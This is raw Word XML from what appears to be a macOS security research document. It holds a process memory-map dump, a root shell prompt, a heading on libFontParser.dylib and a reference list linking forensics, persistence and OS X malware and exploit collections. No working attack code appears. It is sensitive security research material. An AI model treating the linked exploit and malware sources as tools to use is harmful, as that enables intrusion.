SM=COW  /usr/lib/system/libsystem_pthrea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4e95000-00007fff74ea1000 [   48K] rw-/rwx SM=COW  ....framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync</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023000-00007fff75032000 [   60K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimd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06b000-00007fff75080000 [   84K] rw-/rwx SM=COW  /usr/lib/system/libdispatch.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123000-00007fff75125000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_trac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1b8000-00007fff751d8000 [  128K] rw-/rwx SM=COW  /System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox</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DATA                 00007fff751e0000-00007fff751e5000 [   20K] rw-/rwx </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SM=COW  ...Frameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInterna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20f000-00007fff75217000 [   32K] rw-/rwx SM=COW  ...rsions/A/Frameworks/ATS.framework/Versions/A/Resources/libATSServ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282000-00007fff7528a000 [   32K] rw-/rwx SM=COW  /usr/lib/system/libcorecryp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28a000-00007fff7528b000 [    4K] rw-/rwx SM=COW  /usr/lib/libxar.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c54000-00007fff75c56000 [    8K] rw-/rw- SM=COW  /usr/lib/libbsm.0.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d33000-00007fff75d34000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL</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5e1a000-00007fff75e20000 [   24K] rw-/rw- SM=COW  /System/Library/Frameworks/GSS.framework/Versions/A/GS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016000-00007fff76018000 [    8K] rw-/rwx SM=COW  /usr/lib/libresolv.9.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019000-00007fff760f3000 [  872K] rw-/rwx SM=COW  /System/Library/Frameworks/Foundation.framework/Versions/C/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0fb000-00007fff760fc000 [    4K] rw-/rwx SM=COW  /usr/lib/libxslt.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164000-00007fff76165000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_dnss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218000-00007fff76219000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libcach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219000-00007fff76222000 [   36K] rw-/rw- SM=COW  ...ersions/A/Frameworks/CFOpenDirectory.framework/Versions/A/CFOpenDirector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222000-00007fff76224000 [    8K] rw-/rw- SM=COW  ...framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLA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45c000-00007fff7645d000 [    4K] rw-/rwx SM=COW  ...Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImag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602000-00007fff76604000 [    8K] rw-/rwx SM=COW  /usr/lib/libc++abi.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6f7000-00007fff766f8000 [    4K] rw-/rwx SM=COW  ...tem/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLU.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6f8000-00007fff7683a000 [ 1288K] rw-/rwx SM=COW  ...tem/Library/Frameworks/CoreFoundation.framework/Versions/A/Core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688a000-00007fff76892000 [   32K] rw-/rwx SM=COW  /usr/lib/libsandbox.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1e2000-00007fff771e3000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libquarantin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325000-00007fff77329000 [   16K] rw-/rw- SM=COW  ...m/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.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3dd000-00007fff773de000 [    4K] rw-/rw- SM=COW  ...em/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libPng.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3e1000-00007fff773e2000 [    4K] rw-/rw- SM=COW  /usr/lib/libz.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47b000-00007fff77486000 [   44K] rw-/rwx SM=COW  ....framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKi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48c000-00007fff7748d000 [    4K] rw-/rwx SM=COW  /usr/lib/libcmph.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4c9000-00007fff77500000 [  220K] rw-/rwx SM=COW  /System/Library/Frameworks/Security.framework/Versions/A/Security</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DATA                 00007fff77500000-00007fff77501000 [    4K] rw-/rwx SM=COW  ...m/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.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01000-00007fff77503000 [    8K] rw-/rwx SM=COW  ...m/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitr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af000-00007fff775b0000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_mallo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b6000-00007fff775c4000 [   56K] rw-/rwx SM=COW  ...y/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfigur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c4000-00007fff775d8000 [   80K] rw-/rwx SM=COW  ...ary/Frameworks/SecurityFoundation.framework/Versions/A/SecurityFoundat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d9000-00007fff775da000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_coretl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da000-00007fff775db000 [    4K] rw-/rwx SM=COW  .../Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebr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db000-00007fff775e6000 [   44K] rw-/rwx SM=COW  .../Versions/A/Frameworks/SharedFileList.framework/Versions/A/SharedFileLis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f4000-00007fff775f6000 [    8K] rw-/rwx SM=COW  ...rivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSuppor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f6000-00007fff775f7000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_secini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5f9000-00007fff775fc000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_kerne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2a000-00007fff77632000 [   32K] rw-/rw- SM=COW  ...tionServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/AT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43000-00007fff77644000 [    4K] rw-/rw- SM=COW  /usr/lib/libMatch.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ad000-00007fff776ae000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/IOSurface.framework/Versions/A/IOSurfac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b0000-00007fff776b7000 [   28K] rw-/rw- SM=COW  /usr/lib/system/libsystem_network.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bd000-00007fff776be000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libcopyfil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be000-00007fff776bf000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libmach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bf000-00007fff776c0000 [    4K] rw-/rw- SM=COW  /usr/lib/libCRFSuit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c7000-00007fff776c9000 [    8K] rw-/rw- SM=COW  /usr/lib/libiconv.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cd000-00007fff776ce000 [    4K] rw-/rw- SM=COW  ...ry/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClien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ed000-00007fff776ee000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libremovefil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ee000-00007fff776ef000 [    4K] rw-/rw- SM=COW  /usr/lib/libarchive.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6f1000-00007fff776f8000 [   28K] rw-/rw- SM=COW  ...s/A/Frameworks/DictionaryServices.framework/Versions/A/Dictionary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DATA                 00007fff77778000-00007fff7777a000 [    8K] rw-/rw- SM=COW  </w:t>
      </w:r>
      <w:r w:rsidRPr="00677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>/usr/lib/libcompres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82e000-00007fff77897000 [  420K] rw-/rwx SM=COW  /System/Library/Frameworks/CFNetwork.framework/Versions/A/CFNetwork</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897000-00007fff77899000 [    8K] rw-/rwx SM=COW  /usr/lib/libau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899000-00007fff7789a000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libdyl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8e9000-00007fff778ea000 [    4K] rw-/rwx SM=COW  ...ary/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreFSCache.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47000-00007fff77954000 [   52K] rw-/rwx SM=COW  ...ramework/Versions/A/Frameworks/OSServices.framework/Versions/A/OS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61000-00007fff77962000 [    4K] rw-/rwx SM=COW  /usr/lib/libOpenScriptingUtil.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62000-00007fff77964000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcommonCrypto.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65000-00007fff77987000 [  136K] rw-/rwx SM=COW  /usr/lib/libicucore.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99000-00007fff7799b000 [    8K] rw-/rwx SM=COW  ...cationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/Q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9b000-00007fff7799d000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_networkextens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9e3000-00007fff779e4000 [    4K] rw-/rwx SM=COW  /usr/lib/libbz2.1.0.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b14000-00007fff77b1c000 [   32K] rw-/rwx SM=COW  /usr/lib/libc++.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09000-00007fff77c0e000 [   20K] rw-/rwx SM=COW  /usr/lib/libsqlite3.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31000-00007fff77c32000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_coreservice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58000-00007fff77c59000 [    4K] rw-/rwx SM=COW  ...ramework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMis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c2000-00007fff77ccb000 [   36K] rw-/rwx SM=COW  ...ramework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIService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d2000-00007fff77cff000 [  180K] rw-/rwx SM=COW  ...es.framework/Versions/A/Frameworks/Metadata.framework/Versions/A/Metadat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cff000-00007fff77d04000 [   20K] rw-/rwx SM=COW  ...s/CoreServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/A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d04000-00007fff77d05000 [    4K] rw-/rwx SM=COW  /usr/lib/libmaris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d05000-00007fff77d06000 [    4K] rw-/rwx SM=COW  ...es.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/FSEvent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7ffe000-00007fff77fff000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libsystem_notify.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00e000-00007fff78010000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</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010000-00007fff78011000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_platform.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013000-00007fff78015000 [    8K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleVPA.framework/Versions/A/AppleVPA</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DATA                 00007fff78129000-00007fff7812b000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libcompiler_r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15c000-00007fff7816a000 [   56K] rw-/rwx SM=COW  ...lerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage</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177000-00007fff78179000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/Kerberos.framework/Versions/A/Kerbero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18e000-00007fff78193000 [   20K] rw-/rwx SM=COW  ...amework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.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1e3000-00007fff781e4000 [    4K] rw-/rwx SM=COW  /usr/lib/liblzma.5.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2df000-00007fff782e0000 [    4K] rw-/rwx SM=COW  ...framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.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315000-00007fff7831f000 [   40K] rw-/rwx SM=COW  /usr/lib/system/libsystem_c.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31f000-00007fff78372000 [  332K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</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3b4000-00007fff783bc000 [   32K] rw-/rwx SM=COW  /usr/lib/libcups.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3d3000-00007fff783d5000 [    8K] rw-/rwx SM=COW  ...work/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysi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3d5000-00007fff783d6000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_sandbox.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55f000-00007fff78560000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libsystem_configuration.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560000-00007fff78561000 [    4K] rw-/rw- SM=COW  /usr/lib/libpam.2.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8bc000-00007fff788bd000 [    4K] rw-/rwx SM=COW  /usr/lib/libheimdal-asn1.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8e6000-00007fff788ec000 [   24K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVide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95d000-00007fff7895e000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_blocks.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97d000-00007fff7897e000 [    4K] rw-/rwx SM=COW  /usr/lib/libSystem.B.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a17000-00007fff78a18000 [    4K] rw-/rw- SM=COW  /usr/lib/libDiagnosticMessagesClient.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a40000-00007fff78a7c000 [  240K] rw-/rw- SM=COW  /usr/lib/libmecabra.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a85000-00007fff78a86000 [    4K] rw-/rw- SM=COW  /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</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aa0000-00007fff78aa1000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libunwind.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ab4000-00007fff78aec000 [  224K] rw-/rw- SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/ImageIO</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c5d000-00007fff78c5e000 [    4K] rw-/rwx SM=COW  /usr/lib/libChineseTokeniz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c6f000-00007fff78c75000 [   24K] rw-/rwx SM=COW  ...Frameworks/ATS.framework/Versions/A/Resources/libFontRegistryServer.dylib</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__DATA                 00007fff78c7b000-00007fff78c7c000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</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__DATA                 00007fff78c7c000-00007fff78c7f000 [   12K] rw-/rwx SM=COW  ...ersions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesi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Legen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M=sharing mode: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b/>
        <w:t xml:space="preserve">COW=copy_on_write PRV=private NUL=empty ALI=aliased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b/>
        <w:t>SHM=shared ZER=zero_filled S/A=shared_alias</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Summary for process 254</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ReadOnly portion of Libraries: Total=175.0M resident=0K(0%) swapped_out_or_unallocated=175.0M(1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Writable regions: Total=86.9M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=86.9M(10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VIRTUAL   REGION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REGION TYPE                        SIZE    COUNT (non-coalesced)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  =======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TS (font support)                32.0M       29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ATS (font support) (reserved)        4K        2         reserved VM address space (unallocated)</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Activity Tracing                  2048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Dispatch continuations            8192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Kernel Alloc Once                    4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guard page                   32K        7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LLOC metadata                    356K       10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LLOC_SMALL                      32.0M        2         see MALLOC ZONE table below</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LLOC_TINY                       4096K        2         see MALLOC ZONE table below</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emory Tag 88                        4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QLite page cache                  256K        3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TACK GUARD                       56.0M        3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tack                             8264K        3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VM_ALLOCATE                         16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DATA                            8392K      146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LINKEDIT                        91.0M        4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TEXT                            84.1M      15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__UNICODE                          552K        2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mapped file                       25.1M        3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ared memory                      324K        7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  =======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TOTAL                            351.9M      365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TOTAL, minus reserved VM space   351.9M      365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                                 VIRTUAL ALLOCATION      BYTES          REGION</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MALLOC ZONE                         SIZE      COUNT  ALLOCATED  % FULL   COUNT</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  =========  =========  ======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lastRenderedPageBreak/>
        <w:t>DefaultMallocZone_0x10521a000      36.0M      12858      2126K      5%       2</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GFXMallocZone_0x10544c000             0K          0         0K               0</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  =========  =========  ======  ======</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TOTAL                              36.0M      12858      2126K      5%       2</w:t>
      </w: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677E6F" w:rsidRPr="00677E6F" w:rsidRDefault="00677E6F" w:rsidP="0067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677E6F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">sh-3.2# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00677E6F" w:rsidRDefault="00677E6F" w:rsidP="001373F2"/>
    <w:p w:rsidR="00DF5A93" w:rsidRDefault="00DF5A93" w:rsidP="00DF5A93">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc445313339"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libFontParser.dylib</w:t>
      </w:r>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w:rsidR="00DF5A93" w:rsidRDefault="00DF5A93" w:rsidP="001373F2"/>
    <w:p w:rsidR="00DF5A93" w:rsidRPr="00F41154" w:rsidRDefault="00DF5A93" w:rsidP="001373F2">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Bold" w:hAnsi="Menlo-Bold" w:cs="Menlo-Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/Resources/libFontParser.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014464C" w:rsidRPr="0014464C" w:rsidRDefault="00925D66" w:rsidP="0014464C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc445313340"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reference</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00925D66" w:rsidRPr="00925D66" w:rsidRDefault="00925D66" w:rsidP="00053E46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc445313341"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kernel Programming Guid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w:rsidR="00B0420E" w:rsidRDefault="004106D2" w:rsidP="009F6926">
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidR="00925D66" w:rsidRPr="00B120E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/KernelProgramming/About/About.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CA67ED" w:rsidRPr="00925D66" w:rsidRDefault="00CA67ED" w:rsidP="00053E46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc445313342"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apple Sandbox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w:rsidR="00CA67ED" w:rsidRPr="00CA67ED" w:rsidRDefault="00CA67ED" w:rsidP="00CA67ED">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA67ED">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://www.google.com.hk/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=4&amp;ved=0CDkQFjAD&amp;url=http%3A%2F%2Fwww.semantiscope.com%2Fresearch%2FBHDC2011%2FBHDC2011-Slides.pdf&amp;ei=JOYYVYGcMYvy8QWsyIHYAQ&amp;usg=AFQjCNFqTr_fdj_w_S-YkyZakTKzHZInBw</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA67ED" w:rsidRPr="00925D66" w:rsidRDefault="00CA67ED" w:rsidP="00053E46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc445313343"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac memory analysis with volatility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w:rsidR="00CA67ED" w:rsidRPr="00CA67ED" w:rsidRDefault="00CA67ED" w:rsidP="00CA67ED">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA67ED">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>https://digital-forensics.sans.org/summit-archives/2012/mac-memory-analysis-with-volatility.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA67ED" w:rsidRDefault="004106D2" w:rsidP="00CA67ED">
      <w:hyperlink r:id="rId90" w:history="1"/>
      <w:r w:rsidR="00CA67ED">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Mac forensics:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidR="00EB7257">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.blackhat.com/presentations/bh-dc-10/Suiche_Matthieu/Blackhat-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId92" w:history="1">
        <w:r w:rsidR="00EB7257">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://code.google.com/p/volatility/wiki/MacMemoryForensics</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Volatility open source tool to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>深入了解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>系统内核细节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Persistence all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r w:rsidR="00EB7257">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/s3.synack.com/Synack_Shakacon_OSX_Malware_Persistence.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidR="00EB7257">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/synack/knockknock</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:ind w:firstLine="211"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>KnockKnock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t> displays persistent items(Launch Agents, Daemon, Dynamic Library scanner, Cron Job Scanner, extensions scanner for System, Browser……) (scripts, commands, binaries, etc.), that are set to execute automatically on OS X.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:ind w:firstLine="210"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t> Security mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="004106D2" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="00EB7257">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.trailofbits.com/resources/fun_and_games_with_osx_and_iphone_payloads_paper.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Malware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:r>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId96" w:anchor="more" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://contagiodump.blogspot.com/2013/11/osx-malware-and-exploit-collection-100.html#more</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EB7257" w:rsidRDefault="00EB7257" w:rsidP="00EB7257">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
